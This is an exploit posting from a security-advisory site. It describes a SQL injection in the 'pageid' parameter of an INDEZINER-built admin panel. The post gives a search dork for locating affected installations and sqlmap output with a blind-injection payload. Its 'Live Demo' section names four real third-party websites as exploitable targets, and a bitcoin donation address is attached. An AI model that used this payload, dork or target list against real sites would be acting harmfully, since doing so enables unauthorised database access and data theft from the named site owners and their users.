IN ADMIN PANEL SQL injection Vulnerability

Published
Credit
Risk
2017.03.11
xBADGIRL21
Medium
CWE
CVE
Local
Remote
CWE-89
N/A
No
Yes
Dork: IN ADMIN PANEL | Powered by INDEZINER

##############################
# [xBADGIRL21] #
# [N3W PUBLIC 3XPL0IT] #
# _,________ #
# 0day _T _==____() -- #
# /##(_)-' #
# /##/ #
# x21 #
##############################
# Exploit Title : IN ADMIN PANEL SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : IN ADMIN PANEL | Powered by INDEZINER
# Vendor : http://indeziner.com/
# Tested on: [WIN7]
# MyBlog : http://xbadgirl21.blogspot.com
# Date: 10-03-2017
# video Proof : https://youtu.be/G7KBC07JS_U
[*] To buy or Donate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz
######################
#|X|B|A|D|G|I|R|L|2|1|
######################
# [+] Poc :
######################
# [pageid] Get Parameter Vulnerable To SQLi
#
http://127.0.0.1/ALLperematers.php Vuln
######################
# [+] SQLmap PoC:
######################
GET parameter 'pageid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 105 HTTP(s) requests:
---
Parameter: pageid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pageid=7 AND 9360=9360
---
######################
# [!] Live Demo :
######################
# http://www.hatchdesign.co/contact.php?pageid=7
# http://www.arnistonguesthouse.com/content/news-detail-arniston-guest-house-south-africa.php?NewsID=9
# http://www.highwaychurch.co.za/content/news-details-highway-church-centurion-south-africa.php?NewsID=31
# http://www.whitecollars.in/page.php?id=412
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################

References:

https://youtu.be/G7KBC07JS_U


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com